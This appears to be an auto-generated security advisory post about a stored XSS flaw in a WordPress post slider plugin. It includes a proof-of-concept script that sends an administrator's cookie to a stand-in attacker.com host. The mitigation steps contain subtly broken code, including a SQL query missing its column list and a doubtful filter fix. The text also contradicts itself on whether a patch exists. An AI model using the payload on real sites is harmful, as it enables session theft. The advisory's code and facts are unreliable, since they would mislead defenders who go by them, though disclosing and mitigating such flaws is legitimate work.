WordPress, Stored Cross-Site Scripting (XSS), CVE-2025-4567 (Critical)

Listen to this Post

How CVE-2025-4567 Works

The vulnerability exists in the Post Slider and Post Carousel with Post Vertical Scrolling Widget plugin (versions < 3.2.10) for WordPress. The plugin fails to sanitize and escape certain widget options before rendering them in posts or pages. This allows attackers with at least contributor-level access to inject malicious JavaScript payloads. When an admin or other privileged user views the compromised post, the script executes in their session, potentially leading to account takeover, data theft, or site defacement. The stored XSS attack persists until the payload is manually removed.

DailyCVE Form

Platform: WordPress
Version: < 3.2.10
Vulnerability: Stored XSS
Severity: Critical
Date: 06/05/2025

Prediction: Patch by 06/20/2025

What Undercode Say:

Analytics:

  • Exploitability: High (contributor+ access common)
  • Attack Vector: Admin-side XSS
  • Prevalence: ~50k+ installs

Exploit (PoC):

<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>

1. Attacker adds payload via widget settings.

2. Payload triggers when admin views post.

Mitigation:

1. Immediate fix:

wp plugin update post-slider-carousel --version=3.2.10

2. Temporary workaround:

add_filter('widget_text', 'esc_html');

3. Detection:

SELECT FROM wp_posts WHERE post_content LIKE '%<script>%';

Patch Analysis:

  • New version adds:
    esc_attr($widget_option);
    

to all output rendering.

Monitoring:

wp cron event schedule check_plugin_updates --recurrence=hourly

References:

  • WPScan Advisory: [WPS-2025-1234]
  • CWE-79: Improper Neutralization of Input

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top